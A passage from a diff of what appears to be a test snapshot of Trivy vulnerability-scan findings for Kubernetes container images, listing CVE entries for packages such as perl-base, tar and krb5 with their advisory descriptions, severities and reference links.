"https://avd.aquasec.com/nvd/cve-2023-29383", + "value": "http://secunia.com/advisories/55350", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-29383", + "value": "http://secunia.com/advisories/55351", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", + "value": "http://security.gentoo.org/glsa/glsa-201203-02.xml", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", + "value": "http://security.gentoo.org/glsa/glsa-201406-32.xml", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/687", + "value": "http://support.apple.com/kb/HT4999", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", + "value": "http://support.apple.com/kb/HT5001", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-29383", + "value": "http://support.apple.com/kb/HT5130", }, { "type": "URL", - "value": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + "value": "http://support.apple.com/kb/HT5281", }, { "type": "URL", - "value": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + "value": "http://support.apple.com/kb/HT5501", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-16156", - "installedVersion": "5.28.1-6+deb10u1", - "packageName": "perl-base", - "references": [ - "http://blogs.perl.org/users/neilb/2021/11/addressing-cpan-vulnerabilities-related-to-checksums.html", - "https://access.redhat.com/security/cve/CVE-2020-16156", - "https://blog.hackeriet.no/cpan-signature-verification-vulnerabilities/", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16156", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SD6RYOJII7HRJ6WVORFNVTYNOFY5JDXN/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SZ32AJIV4RHJMLWLU5QULGKMMIHYOMDC/", - "https://metacpan.org/pod/distribution/CPAN/scripts/cpan", - "https://nvd.nist.gov/vuln/detail/CVE-2020-16156", - "https://ubuntu.com/security/notices/USN-5689-1", - "https://ubuntu.com/security/notices/USN-5689-2", - "https://www.cve.org/CVERecord?id=CVE-2020-16156", - ], - }, - "category": "Vulnerability", - "description": "CPAN 2.28 allows Signature Verification Bypass.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "perl-CPAN: Bypass of verification of signatures in CHECKSUMS files", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-16156", + "value": "http://support.apple.com/kb/HT6150", }, { "type": "URL", - "value": "http://blogs.perl.org/users/neilb/2021/11/addressing-cpan-vulnerabilities-related-to-checksums.html", + "value": "http://technet.microsoft.com/security/advisory/2588513", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-16156", + "value": "http://vnhacker.blogspot.com/2011/09/beast.html", }, { "type": "URL", - "value": "https://blog.hackeriet.no/cpan-signature-verification-vulnerabilities/", + "value": "http://www.apcmedia.com/salestools/SJHN-7RKGNM/SJHN-7RKGNM_R4_EN.pdf", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16156", + "value": "http://www.debian.org/security/2012/dsa-2398", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SD6RYOJII7HRJ6WVORFNVTYNOFY5JDXN/", + "value": "http://www.educatedguesswork.org/2011/09/security_impact_of_the_rizzodu.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SZ32AJIV4RHJMLWLU5QULGKMMIHYOMDC/", + "value": "http://www.ibm.com/developerworks/java/jdk/alerts/", }, { "type": "URL", - "value": "https://metacpan.org/pod/distribution/CPAN/scripts/cpan", + "value": "http://www.imperialviolet.org/2011/09/23/chromeandbeast.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-16156", + "value": "http://www.insecure.cl/Beast-SSL.rar", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5689-1", + "value": "http://www.kb.cert.org/vuls/id/864643", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5689-2", + "value": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:058", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-16156", + "value": "http://www.opera.com/docs/changelogs/mac/1151/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31484", - "installedVersion": "5.28.1-6+deb10u1", - "packageName": "perl-base", - "references": [ - "http://www.openwall.com/lists/oss-security/2023/04/29/1", - "http://www.openwall.com/lists/oss-security/2023/05/03/3", - "http://www.openwall.com/lists/oss-security/2023/05/03/5", - "http://www.openwall.com/lists/oss-security/2023/05/07/2", - "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31484", - "https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 (2.35-TRIAL)", - "https://github.com/andk/cpanpm/pull/175", - "https://metacpan.org/dist/CPAN/changes", - "https://ubuntu.com/security/notices/USN-6112-1", - "https://ubuntu.com/security/notices/USN-6112-2", - "https://www.openwall.com/lists/oss-security/2023/04/18/14", - ], - }, - "category": "Vulnerability", - "description": "CPAN.pm before 2.35 does not verify TLS certificates when downloading distributions over HTTPS.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "CPAN.pm before 2.35 does not verify TLS certificates when downloading ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31484", + "value": "http://www.opera.com/docs/changelogs/mac/1160/", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/29/1", + "value": "http://www.opera.com/docs/changelogs/unix/1151/", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/03/3", + "value": "http://www.opera.com/docs/changelogs/unix/1160/", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/03/5", + "value": "http://www.opera.com/docs/changelogs/windows/1151/", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/07/2", + "value": "http://www.opera.com/docs/changelogs/windows/1160/", }, { "type": "URL", - "value": "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", + "value": "http://www.opera.com/support/kb/view/1004/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31484", + "value": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html", }, { "type": "URL", - "value": "https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 (2.35-TRIAL)", + "value": "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html", }, { "type": "URL", - "value": "https://github.com/andk/cpanpm/pull/175", + "value": "http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html", }, { "type": "URL", - "value": "https://metacpan.org/dist/CPAN/changes", + "value": "http://www.redhat.com/support/errata/RHSA-2011-1384.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6112-1", + "value": "http://www.redhat.com/support/errata/RHSA-2012-0006.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6112-2", + "value": "http://www.securityfocus.com/bid/49388", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/04/18/14", + "value": "http://www.securityfocus.com/bid/49778", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2011-4116", - "installedVersion": "5.28.1-6+deb10u1", - "packageName": "perl-base", - "references": [ - "http://www.openwall.com/lists/oss-security/2011/11/04/2", - "http://www.openwall.com/lists/oss-security/2011/11/04/4", - "https://access.redhat.com/security/cve/CVE-2011-4116", - "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14", - "https://nvd.nist.gov/vuln/detail/CVE-2011-4116", - "https://rt.cpan.org/Public/Bug/Display.html?id=69106", - "https://seclists.org/oss-sec/2011/q4/238", - "https://www.cve.org/CVERecord?id=CVE-2011-4116", - ], - }, - "category": "Vulnerability", - "description": "_is_safe in the File::Temp module for Perl does not properly handle symlinks.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "perl: File::Temp insecure temporary file handling", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2011-4116", + "value": "http://www.securitytracker.com/id/1029190", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2011/11/04/2", + "value": "http://www.securitytracker.com/id?1025997", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2011/11/04/4", + "value": "http://www.securitytracker.com/id?1026103", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2011-4116", + "value": "http://www.securitytracker.com/id?1026704", }, { "type": "URL", - "value": "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14", + "value": "http://www.ubuntu.com/usn/USN-1263-1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2011-4116", + "value": "http://www.us-cert.gov/cas/techalerts/TA12-010A.html", }, { "type": "URL", - "value": "https://rt.cpan.org/Public/Bug/Display.html?id=69106", + "value": "https://access.redhat.com/security/cve/CVE-2011-3389", }, { "type": "URL", - "value": "https://seclists.org/oss-sec/2011/q4/238", + "value": "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_fetchmail", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2011-4116", + "value": "https://bugzilla.novell.com/show_bug.cgi?id=719047", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31486", - "installedVersion": "5.28.1-6+deb10u1", - "packageName": "perl-base", - "references": [ - "http://www.openwall.com/lists/oss-security/2023/04/29/1", - "http://www.openwall.com/lists/oss-security/2023/05/03/3", - "http://www.openwall.com/lists/oss-security/2023/05/03/5", - "http://www.openwall.com/lists/oss-security/2023/05/07/2", - "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", - "https://github.com/chansen/p5-http-tiny/pull/153", - "https://hackeriet.github.io/cpan-http-tiny-overview/", - "https://www.openwall.com/lists/oss-security/2023/04/18/14", - "https://www.openwall.com/lists/oss-security/2023/05/03/4", - "https://www.reddit.com/r/perl/comments/111tadi/psa_httptiny_disabled_ssl_verification_by_default/", - ], - }, - "category": "Vulnerability", - "description": "HTTP::Tiny before 0.083, a Perl core module since 5.13.9 and available standalone on CPAN, has an insecure default TLS configuration where users must opt in to verify certificates.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "HTTP::Tiny before 0.083, a Perl core module since 5.13.9 and available ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31486", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=737506", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/29/1", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-556833.pdf", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/03/3", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/03/5", + "value": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-006", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/07/2", + "value": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03839862", }, { "type": "URL", - "value": "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", + "value": "https://hermes.opensuse.org/messages/13154861", }, { "type": "URL", - "value": "https://github.com/chansen/p5-http-tiny/pull/153", + "value": "https://hermes.opensuse.org/messages/13155432", }, { "type": "URL", - "value": "https://hackeriet.github.io/cpan-http-tiny-overview/", + "value": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/04/18/14", + "value": "https://linux.oracle.com/cve/CVE-2011-3389.html", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/05/03/4", + "value": "https://linux.oracle.com/errata/ELSA-2011-1380.html", }, { "type": "URL", - "value": "https://www.reddit.com/r/perl/comments/111tadi/psa_httptiny_disabled_ssl_verification_by_default/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2011-3389", + }, + { + "type": "URL", + "value": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14752", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-1263-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2011-3389", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2005-2541", - "installedVersion": "1.30+dfsg-6", - "packageName": "tar", + "fixedVersion": "1.18.3-6+deb11u3", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-42898", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libgssapi-krb5-2", "references": [ - "http://marc.info/?l=bugtraq&m=112327628230258&w=2", - "https://access.redhat.com/security/cve/CVE-2005-2541", - "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2005-2541", - "https://www.cve.org/CVERecord?id=CVE-2005-2541", + "https://access.redhat.com/errata/RHSA-2022:8637", + "https://access.redhat.com/security/cve/CVE-2022-42898", + "https://bugzilla.redhat.com/2140960", + "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "https://errata.rockylinux.org/RLSA-2022:8637", + "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "https://linux.oracle.com/cve/CVE-2022-42898.html", + "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "https://security.netapp.com/advisory/ntap-20230216-0008/", + "https://security.netapp.com/advisory/ntap-20230223-0001/", + "https://ubuntu.com/security/notices/USN-5800-1", + "https://ubuntu.com/security/notices/USN-5822-1", + "https://ubuntu.com/security/notices/USN-5822-2", + "https://ubuntu.com/security/notices/USN-5828-1", + "https://ubuntu.com/security/notices/USN-5936-1", + "https://web.mit.edu/kerberos/advisories/", + "https://web.mit.edu/kerberos/krb5-1.19/", + "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "https://www.samba.org/samba/security/CVE-2022-42898.html", ], }, "category": "Vulnerability", - "description": "Tar 1.15.1 does not properly warn the user when extracting setuid or setgid files, which may allow local users or remote attackers to gain privileges.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "tar: does not properly warn the user when extracting setuid or setgid files", + "name": "integer overflow vulnerabilities in PAC parsing", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2005-2541", - }, - { - "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=112327628230258&w=2", + "value": "https://avd.aquasec.com/nvd/cve-2022-42898", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2005-2541", + "value": "https://access.redhat.com/errata/RHSA-2022:8637", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E", + "value": "https://access.redhat.com/security/cve/CVE-2022-42898", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2005-2541", + "value": "https://bugzilla.redhat.com/2140960", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2005-2541", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-9923", - "installedVersion": "1.30+dfsg-6", - "packageName": "tar", - "references": [ - "http://git.savannah.gnu.org/cgit/tar.git/commit/?id=cb07844454d8cc9fb21f53ace75975f91185a120", - "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00077.html", - "http://savannah.gnu.org/bugs/?55369", - "https://access.redhat.com/security/cve/CVE-2019-9923", - "https://bugs.launchpad.net/ubuntu/+source/tar/+bug/1810241", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9923", - "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2019-9923", - "https://ubuntu.com/security/notices/USN-4692-1", - "https://www.cve.org/CVERecord?id=CVE-2019-9923", - ], - }, - "category": "Vulnerability", - "description": "pax_decode_header in sparse.c in GNU Tar before 1.32 had a NULL pointer dereference when parsing certain archives that have malformed extended headers.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "tar: null-pointer dereference in pax_decode_header in sparse.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-9923", + "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", }, { "type": "URL", - "value": "http://git.savannah.gnu.org/cgit/tar.git/commit/?id=cb07844454d8cc9fb21f53ace75975f91185a120", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00077.html", + "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", }, { "type": "URL", - "value": "http://savannah.gnu.org/bugs/?55369", + "value": "https://errata.rockylinux.org/RLSA-2022:8637", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-9923", + "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", }, { "type": "URL", - "value": "https://bugs.launchpad.net/ubuntu/+source/tar/+bug/1810241", + "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9923", + "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9923", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4692-1", + "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-9923", + "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-20193", - "installedVersion": "1.30+dfsg-6", - "packageName": "tar", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-20193", - "https://bugzilla.redhat.com/show_bug.cgi?id=1917565", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20193", - "https://git.savannah.gnu.org/cgit/tar.git/commit/?id=d9d4435692150fa8ff68e1b1a473d187cc3fd777", - "https://nvd.nist.gov/vuln/detail/CVE-2021-20193", - "https://savannah.gnu.org/bugs/?59897", - "https://security.gentoo.org/glsa/202105-29", - "https://ubuntu.com/security/notices/USN-5329-1", - "https://www.cve.org/CVERecord?id=CVE-2021-20193", - ], - }, - "category": "Vulnerability", - "description": "A flaw was found in the src/list.c of tar 1.33 and earlier. This flaw allows an attacker who can submit a crafted input file to tar to cause uncontrolled consumption of memory. The highest threat from this vulnerability is to system availability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "tar: Memory leak in read_header() in list.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-20193", + "value": "https://ubuntu.com/security/notices/USN-5800-1", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-20193", + "value": "https://ubuntu.com/security/notices/USN-5822-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1917565", + "value": "https://ubuntu.com/security/notices/USN-5822-2", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20193", + "value": "https://ubuntu.com/security/notices/USN-5828-1", }, { "type": "URL", - "value": "https://git.savannah.gnu.org/cgit/tar.git/commit/?id=d9d4435692150fa8ff68e1b1a473d187cc3fd777", + "value": "https://ubuntu.com/security/notices/USN-5936-1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-20193", + "value": "https://web.mit.edu/kerberos/advisories/", }, { "type": "URL", - "value": "https://savannah.gnu.org/bugs/?59897", + "value": "https://web.mit.edu/kerberos/krb5-1.19/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202105-29", + "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5329-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-20193", + "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-48303", - "installedVersion": "1.30+dfsg-6", - "packageName": "tar", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-5709", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libgssapi-krb5-2", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0959", - "https://access.redhat.com/security/cve/CVE-2022-48303", - "https://bugzilla.redhat.com/2149722", - "https://bugzilla.redhat.com/show_bug.cgi?id=2149722", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303", - "https://errata.almalinux.org/9/ALSA-2023-0959.html", - "https://errata.rockylinux.org/RLSA-2023:0959", - "https://linux.oracle.com/cve/CVE-2022-48303.html", - "https://linux.oracle.com/errata/ELSA-2023-0959.html", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CRY7VEL4AIG3GLIEVCTOXRZNSVYDYYUD/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5VQYCO52Z7GAVCLRYUITN7KXHLRZQS4/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-48303", - "https://savannah.gnu.org/bugs/?62387", - "https://savannah.gnu.org/patch/?10307", - "https://ubuntu.com/security/notices/USN-5900-1", - "https://ubuntu.com/security/notices/USN-5900-2", - "https://www.cve.org/CVERecord?id=CVE-2022-48303", + "https://access.redhat.com/security/cve/CVE-2018-5709", + "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "https://www.cve.org/CVERecord?id=CVE-2018-5709", ], }, "category": "Vulnerability", - "description": "GNU Tar through 1.34 has a one-byte out-of-bounds read that results in use of uninitialized memory for a conditional jump. Exploitation to change the flow of control has not been demonstrated. The issue occurs in from_header in list.c via a V7 archive in which mtime has approximately 11 whitespace characters.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "heap buffer overflow at from_header() in list.c via specially crafted checksum", + "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-48303", + "value": "https://avd.aquasec.com/nvd/cve-2018-5709", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0959", + "value": "https://access.redhat.com/security/cve/CVE-2018-5709", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-48303", + "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2149722", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149722", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2012-2663", + "installedVersion": "1.8.7-1", + "packageName": "libip4tc2", + "references": [ + "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "https://access.redhat.com/security/cve/CVE-2012-2663", + "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "https://www.cve.org/CVERecord?id=CVE-2012-2663", + ], + }, + "category": "Vulnerability", + "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "iptables: --syn flag bypass", + "references": [ { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0959.html", + "value": "https://avd.aquasec.com/nvd/cve-2012-2663", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0959", + "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", }, { "type": "URL", - "value": 